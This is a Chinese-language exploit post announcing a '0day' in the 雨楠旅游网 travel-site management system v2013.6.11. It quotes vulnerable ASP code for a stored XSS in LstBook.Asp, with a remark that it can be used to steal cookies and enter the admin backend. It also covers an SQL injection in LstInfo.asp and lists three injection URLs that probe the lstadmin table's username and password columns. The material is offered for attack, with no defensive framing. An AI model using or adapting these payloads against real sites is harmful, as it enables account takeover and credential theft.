雨楠旅游网服务管理系统 v2013.6.11 最新漏洞0day

漏洞-1

漏洞类型:存储型xss

代码文件:LstBook.Asp

详细代码:
[php]
------------------------------------------------

If action="addbook" Then

If Trim(Request("xm"))="" Then

Call alert("姓名不能为空","-1")

End If

If Trim(Request("sj"))="" Then

Call alert("手机不能为空","-1")

End If

If Trim(Request("dz"))="" Then

Call alert("地址不能为空","-1")

End if

Set oRs=server.createobject("adodb.recordset")

sSql="Select * from [LstBook]"

oRs.open sSql,oconn,1,3

oRs.addnew

oRs("xm")=Trim(Request("xm"))

oRs("sj")=Trim(Request("sj"))

oRs("dz")=Trim(Request("dz"))

oRs("qq")=Trim(Request("qq"))

oRs("email")=Trim(Request("email"))

oRs("ly")=Trim(Request("ly"))

oRs("time")=now()

oRs("state")=0

oRs.update

oRs.close

Call Alert("您的留言提交成功,我们将尽快给您解答。","/lstbook.asp")

Set oRs = Nothing

[/php]
--------------------------------------------------------------

利用说明:以上代码都只是用trim过滤了空格而已,所以.....呵呵 可以利用此xss截取cookie进后台!

漏洞-2

漏洞类型:sql注入

代码文件:LstInfo.asp

详细代码:

------------------------------------------------
[php]

<%

If Id="" Then

Call alert("参数错误,返回首页.","/")

End If

'本页

Set v= oConn.Execute("SELECT top 1 * FROM [LstJob] where Id ="&Id)

If v.bof And v.eof Then

Call BackUrl("/")

End If

oConn.Execute("UPDATE [LstJob] SET Jobhits = Jobhits +1 where Id ="&Id)

[/php]
代码说明:ID变量在“”文件里面,而在conn.asp文件里面ID是用Request来获取的~!!!这样就很明显了~!

PS:下面列举3条基本测试语句。其他的自行解决!

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select * from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usradmin from lstadmin)

/LstJobInfo.asp?TT=&SS=&Id=1 and exists(select usrpass from lstadmin)

发表评论